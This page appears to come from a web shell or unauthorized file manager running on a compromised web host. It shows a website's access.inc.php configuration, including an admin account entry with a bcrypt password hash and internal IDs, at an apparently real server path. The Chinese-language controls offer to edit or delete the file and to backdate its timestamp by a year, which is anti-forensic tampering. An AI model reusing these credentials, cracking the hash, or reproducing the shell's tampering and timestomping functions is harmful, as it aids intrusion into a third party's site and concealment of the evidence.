文件操作 - access.inc.php
返回文件管理
返回主菜单
删除本文件
文件: /home/tecnoht/public_html/sbs-italy--it/res/access.inc.php
编辑文件内容
<?php // Users data $imSettings['access']['users'] = array( 'example@example.com' => array( 'id' => '3qft58xx', 'groups' => array('829dvqg2'), 'firstname' => 'Admin', 'lastname' => '', 'password' => '$2a$11$4pNw93b3N5303ciGARza8../OixiTf/M4IQFDstLqSz0NTHjlJIWy', 'crypt_encoding' => 'csharp_bcrypt', 'db_stored' => false, 'page' => false ) ); // Admins list $imSettings['access']['admins'] = array('3qft58xx'); // Page/Users permissions $imSettings['access']['pages'] = array(); // PASSWORD CRYPT $imSettings['access']['password_crypt'] = array( 'encoding_id' => 'php_default', 'encodings' => array( 'no_crypt' => array( 'encode' => function ($pwd) { return $pwd; }, 'check' => function ($input, $encoded) { return $input == $encoded; } ), 'php_default' => array( 'encode' => function ($pwd) { return password_hash($pwd, PASSWORD_DEFAULT); }, 'check' => function ($input, $encoded) { return password_verify($input, $encoded); } ), 'csharp_bcrypt' => array( 'encode' => function ($pwd) { return password_hash($pwd, PASSWORD_BCRYPT); }, 'check' => function ($input, $encoded) { return password_verify($input, $encoded); } ) ) ); // End of file access.inc.php
修改文件时间
将文件时间修改为当前时间的前一年
删除文件